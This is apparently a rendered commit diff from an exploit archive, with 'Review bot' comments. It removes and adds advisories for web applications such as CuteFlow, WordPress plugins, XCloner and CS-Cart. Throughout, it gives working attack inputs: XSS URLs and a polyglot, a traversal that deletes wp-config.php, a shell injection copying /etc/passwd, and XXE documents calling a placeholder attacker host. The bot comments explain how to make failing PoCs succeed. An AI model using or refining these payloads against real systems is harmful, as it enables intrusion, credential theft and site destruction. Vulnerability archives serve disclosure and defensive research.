';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88 ,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
|
|
||||||
|
|
||||||
Proof-of-concpet URI:
|
|
||||||
http://www.example.com/index.php?file=News%3CScRiPt%20%0a%0d%3Ealert(1121436095)%3B%3C/ScRiPt%3E
@ -1,9 +0,0 @@
|
||||||
source: http://www.securityfocus.com/bid/28500/info
|
|
||||||
|
|
||||||
CuteFlow Bin is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. The issues include a SQL-injection vulnerability and multiple cross-site scripting vulnerabilities.
|
|
||||||
|
|
||||||
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
|
||||||
|
|
||||||
These issues affect CuteFlow Bin 1.5.0; other versions may also be affected.
|
|
||||||
|
|
||||||
http://www.example.com/[path]//pages/showtemplates.php?language=<script>alert(1111)</script>
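Review bot: the description promises 'a SQL-injection vulnerability and multiple cross-site scripting vulnerabilities', but none of the six CuteFlow files split out of BID 28500 in this commit carries an SQLi PoC and all six titles are XSS; either add the SQLi entry or trim the description to what the PoC demonstrates. The URL here also has a doubled slash, `[path]//pages/`, shared by four of the six entries, that should be `[path]/pages/`.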
@ -1,9 +0,0 @@
|
||||||
source: http://www.securityfocus.com/bid/28500/info
|
|
||||||
|
|
||||||
CuteFlow Bin is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. The issues include a SQL-injection vulnerability and multiple cross-site scripting vulnerabilities.
|
|
||||||
|
|
||||||
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
|
||||||
|
|
||||||
These issues affect CuteFlow Bin 1.5.0; other versions may also be affected.
|
|
||||||
|
|
||||||
http://www.example.com/[path]//pages/editmailinglist_step1.php?language=<script>alert(222)</script>
@ -1,9 +0,0 @@
|
||||||
source: http://www.securityfocus.com/bid/28500/info
|
|
||||||
|
|
||||||
CuteFlow Bin is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. The issues include a SQL-injection vulnerability and multiple cross-site scripting vulnerabilities.
|
|
||||||
|
|
||||||
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
|
||||||
|
|
||||||
These issues affect CuteFlow Bin 1.5.0; other versions may also be affected.
|
|
||||||
|
|
||||||
http://www.example.com/[path]/page/showcirculation.php?language=<script>alert(1111)</script>
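Review bot: the path here is `[path]/page/showcirculation.php`, while every sibling CuteFlow entry and the new title (`pages/showcirculation.php`) use the `pages/` directory; this looks like a typo that makes the PoC 404, and it should be `[path]/pages/showcirculation.php?language=...`.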
@ -1,9 +0,0 @@
|
||||||
source: http://www.securityfocus.com/bid/28500/info
|
|
||||||
|
|
||||||
CuteFlow Bin is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. The issues include a SQL-injection vulnerability and multiple cross-site scripting vulnerabilities.
|
|
||||||
|
|
||||||
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
|
||||||
|
|
||||||
These issues affect CuteFlow Bin 1.5.0; other versions may also be affected.
|
|
||||||
|
|
||||||
http://www.example.com/[path]/pages/edittemplate_step2.php?language=<script>alert(1111)</script>
@ -1,9 +0,0 @@
|
||||||
source: http://www.securityfocus.com/bid/28500/info
|
|
||||||
|
|
||||||
CuteFlow Bin is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. The issues include a SQL-injection vulnerability and multiple cross-site scripting vulnerabilities.
|
|
||||||
|
|
||||||
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
|
||||||
|
|
||||||
These issues affect CuteFlow Bin 1.5.0; other versions may also be affected.
|
|
||||||
|
|
||||||
http://www.example.com/[path]//pages/showfields.php?language=<script>alert(1111)</script>
@ -1,9 +0,0 @@
|
||||||
source: http://www.securityfocus.com/bid/28500/info
|
|
||||||
|
|
||||||
CuteFlow Bin is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. The issues include a SQL-injection vulnerability and multiple cross-site scripting vulnerabilities.
|
|
||||||
|
|
||||||
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
|
||||||
|
|
||||||
These issues affect CuteFlow Bin 1.5.0; other versions may also be affected.
|
|
||||||
|
|
||||||
http://www.example.com/[path]//pages/showuser.php?language=<script>alert(1111)</script>
@ -1,9 +0,0 @@
|
||||||
source: http://www.securityfocus.com/bid/29005/info
|
|
||||||
|
|
||||||
phpAddressBook is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
|
||||||
|
|
||||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
|
|
||||||
|
|
||||||
phpAddressBook 2.0 is vulnerable; other versions may also be affected.
|
|
||||||
|
|
||||||
http://www.example.com/pad/?username="<[XSS]
@ -1,11 +0,0 @@
|
||||||
source: http://www.securityfocus.com/bid/53514/info
|
|
||||||
|
|
||||||
The Download Monitor plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
|
|
||||||
|
|
||||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
|
||||||
|
|
||||||
Download Monitor 3.3.5.4 is vulnerable; other versions may also be affected.
|
|
||||||
|
|
||||||
http://www.example.com/wp-content/plugins/download-monitor/uploader.php?tab=addtags="><script>alert(1)</script>
|
|
||||||
http://www.example.com/wp-content/plugins/download-monitor/uploader.php?tab=addthumbnail="><script>alert(1)</script>
|
|
||||||
http://www.example.com/wp-content/plugins/download-monitor/uploader.php?tab=downloads&s=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E
@ -1,9 +0,0 @@
|
||||||
source: http://www.securityfocus.com/bid/53517/info
|
|
||||||
|
|
||||||
The Download Manager plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
|
||||||
|
|
||||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
|
||||||
|
|
||||||
Download Manager 2.2.2 is vulnerable; other versions may also be affected.
|
|
||||||
|
|
||||||
http://www.example.com/wp-admin/admin.php?page=file-manager/categories&cid=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E
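Review bot: the PoC lives under `wp-admin/admin.php?page=file-manager/categories`, so it only renders for a logged-in user who can reach the plugin's admin page; the description should say this is an authenticated, admin-context reflected XSS rather than leaving 'unsuspecting user' unqualified.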
@ -1,47 +0,0 @@
|
||||||
# Exploit Title: XCloner <= 3.1.5 Multiple Vulnerabilities
|
|
||||||
# Google Dork: inurl:"plugins/xcloner-backup-and-restore/readme.txt" -site:wordpress.org
|
|
||||||
# Date: 08/11/2016
|
|
||||||
# Exploit Author: Felipe Molina (@felmoltor)
|
|
||||||
# Vendor Homepage: www.xcloner.com
|
|
||||||
# Software Link: https://es.wordpress.org/plugins/xcloner-backup-and-restore/
|
|
||||||
# Version: 3.1.5 and lower
|
|
||||||
# Tested on: Ubuntu 14 and PHP 5
|
|
||||||
# Product description: XCloner is a plugin for wordpress and Joomla! with more than 70.000 active installations to easily execute backup and restores on your CMS.
|
|
||||||
|
|
||||||
Authenticated DoS or CMS destruction
|
|
||||||
--------------------------------------------------------
|
|
||||||
Summary: XClonner does not check the file path is going to unlink
|
|
||||||
after unlinking it. Therefore, a deletion of random files on the file
|
|
||||||
system accesible by the web process is possible. A destruction of the
|
|
||||||
blog can be achieved with the following PoC:
|
|
||||||
|
|
||||||
1. Authenticate to wordpress with an administrator
|
|
||||||
2. Access to XCloner to the following URL:
|
|
||||||
* http://example.com/wp-admin/plugins.php?page=xcloner_show&option=xcloner&task=cron_delete&fconfig=../../../../wp-config.php
|
|
||||||
3. See how your wordpress stops working.
|
|
||||||
4. In case that the web server is running with higher privileges, a more destructive action would be possible deleting O.S. critical files.
|
|
||||||
|
|
||||||
Authenticated RCE
|
|
||||||
----------------------------
|
|
||||||
Summary:
|
|
||||||
XCloner does not filter the command line is being used to execute the
|
|
||||||
tar of a backup.
|
|
||||||
Random shell commands can be injected in this field.
|
|
||||||
A file creation in the file system can be achieved with the following PoC:
|
|
||||||
|
|
||||||
1. Authenticate to wordpress with an administrator
|
|
||||||
2. Access to Plugins -> XCloner
|
|
||||||
3. Navigate to Administration -> Configuration -> General
|
|
||||||
4. In "Server Use Options" set the field "Tar path or command" with
|
|
||||||
the following value:
|
|
||||||
* tar -h; cp /etc/passwd ./passwd.txt ; tar -k
|
|
||||||
5. Now go to "Actions -> Generate Backup"
|
|
||||||
6. Find the file passwd.txt in the wordpress root folder
|
|
||||||
7. Navigate to http://example.com/passwd.txt to see the file /etc/passwd
|
|
||||||
8. Looking at the code, the field to specify the mysqldump command
|
|
||||||
"Mysqldump path or command" is also injectable, but I have not a PoC
|
|
||||||
for it.
|
|
||||||
|
|
||||||
--
|
|
||||||
|
|
||||||
Felipe Molina de la Torre (@felmoltor)
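Review bot: the RCE PoC's `cp /etc/passwd ./passwd.txt` writes relative to the PHP process's working directory, and step 6 ('Find the file passwd.txt in the wordpress root folder') silently assumes that directory is the WordPress root; state the assumption or use an absolute path so the PoC does not fail on setups where the cwd differs. The header also describes XCloner as a plugin 'for wordpress and Joomla!' with 'Version: 3.1.5 and lower', yet both PoCs are WordPress-only (wp-admin, wp-config.php), so the Joomla! build should be marked untested or excluded, and 'Date: 08/11/2016' is ambiguous between 8 November and 11 August.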
107
platforms/php/webapps/40770.txt
Executable file
@ -0,0 +1,107 @@
|
||||||
|
# Software : CS-Cart <= 4.3.10
# Vendor home : cs-cart.com
# Author : Ahmed Sultan (@0x4148)
# Home : 0x4148.com
# Email : 0x4148@gmail.com
# Tested on : apache on windoes with php 5.4.4 / apache on linux with php <5.2.17

From vendor site
CS-Cart is an impressive platform for users to any level of eCommerce
experience.
With loads of features at a great price, CS-Cart is a great shopping cart
solution that will quickly enable your online store to do business.

XXE I : Twimgo addon
app/addons/twigmo/Twigmo/Api/ApiData.php
Line 131
public static function parseDocument($data, $format =
TWG_DEFAULT_DATA_FORMAT)
{
if ($format == 'xml') {
$result = @simplexml_load_string($data, 'SimpleXMLElement',
LIBXML_NOCDATA);
return self::getObjectAsArray($result);
} elseif ($format == 'jsonp') {
return (array) json_decode($data, true);
} elseif ($format == 'json') {
return (array) json_decode($data, true);
}

return false;
}
POC
<?php
$xml="
<!DOCTYPE testingxxe [<!ENTITY xxe SYSTEM 'http://YOUR_HOST/0x4148.jnk' >]>
<document>
<Author>Ahmed sultan (0x4148)</Author>
<killit>&xxe;</killit>
</document>
";
echo rawurlencode(base64_encode($xml));
?>

change YOUR_HOST to your server address , use the output in the following
POST request
Action -> HOST/cs-cart/index.php?dispatch=twigmo.post
Data -> action=add_to_cart&data=DATA_OUT_PUT_HERE&format=xml
a GET request will be sent to your webserver from the vulnerable host
indicating successful attack
(Require twimgo addon to be activated)

XXE II : Amazon payment
File : app/payments/amazon/amazon_callback.php
Line 16
use Tygh\Registry;

if (!defined('BOOTSTRAP')) { die('Access denied'); }

include_once (Registry::get('config.dir.payments') .
'amazon/amazon_func.php');

fn_define('AMAZON_ORDER_DATA', 'Z');

if (!empty($_POST['order-calculations-request'])) {
$xml_response = $_POST['order-calculations-request'];

} elseif (!empty($_POST['NotificationData'])) {
$xml_response = $_POST['NotificationData'];
}

if (!empty($_POST['order-calculations-error'])) {
// Process the Amazon callback error
$xml_error = $_POST['order-calculations-error'];
$xml = @simplexml_load_string($xml_error);
if (empty($xml)) {
$xml = @simplexml_load_string(stripslashes($xml_error));
}

// Get error message
$code = (string) $xml->OrderCalculationsErrorCode;
$message = (string) $xml->OrderCalculationsErrorMessage;

POC
sending POST request to
app/payments/amazon/amazon_checkout.php
setting POST parameter order-calculations-request to
<?xml version='1.0'?>
<!DOCTYPE testingxxe [<!ENTITY xxe SYSTEM "http://host/amazon.jnk" >]>
<document>
<Author>Ahmed sultan (0x4148)</Author>
<killit>%26xxe%3b</killit>
</document>

Will result in an GET request to your host from the vulnerable machine ,
indicating successful attack
(Require amazon payment method to be activated)


Disclosure time line
10/11 vulnerabilities reported to the vendor
11/11 Vendor asked for extra details
12/11 Vendor acknowledged the validity of vulnerabilities and asked for
time to fix
16/11 vendor permitted public release

Reference
https://0x4148.com/2016/11/10/cs-cart/
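Review bot: the XXE II PoC does not match the code it cites and, as written, would not reach the parser. The vulnerable source is given as `app/payments/amazon/amazon_callback.php`, but the PoC says to POST to `app/payments/amazon/amazon_checkout.php`; and the first executable line quoted is `if (!defined('BOOTSTRAP')) { die('Access denied'); }`, so a direct request to either file under `app/payments/` dies before any `simplexml_load_string` call. The PoC needs to state how the callback is reached with BOOTSTRAP defined, as the XXE I PoC does with `index.php?dispatch=twigmo.post`. Second, the excerpt only shows `$xml_response` being assigned from `order-calculations-request`; the `simplexml_load_string` calls shown parse `$xml_error` from `order-calculations-error`, so either quote the lines that parse `$xml_response` or point the PoC at the `order-calculations-error` parameter. Minor: `%26xxe%3b` for `&xxe;` is correct for a form-urlencoded body but should be stated so readers do not send it literally; "Twimgo" in the heading and the activation note should read "Twigmo" (matching the path `app/addons/twigmo/`), and "windoes" in the Tested-on line should read "windows".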
@ -111,7 +111,7 @@ POST parameter "bolini_searchengine46Search".

Example:

bolini_searchengine46Search = '><IMG SRC=javascript:alert("DSecRG XSS")>

--------------------------------------------------------------------
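Review bot: the rendered hunk shows only old/new pairs of identical context lines (`Example:`, the payload line and the separator), so the line actually modified in this `@ -111,7 +111,7 @@` hunk is not visible here and the change cannot be verified from this view; check it against the raw diff. The payload itself, `'><IMG SRC=javascript:alert("DSecRG XSS")>`, relies on a `javascript:` URL in an image `src`, which current browsers do not execute; it still shows the injection point, but anyone reproducing the entry should expect to swap in an event-handler attribute to see the alert fire.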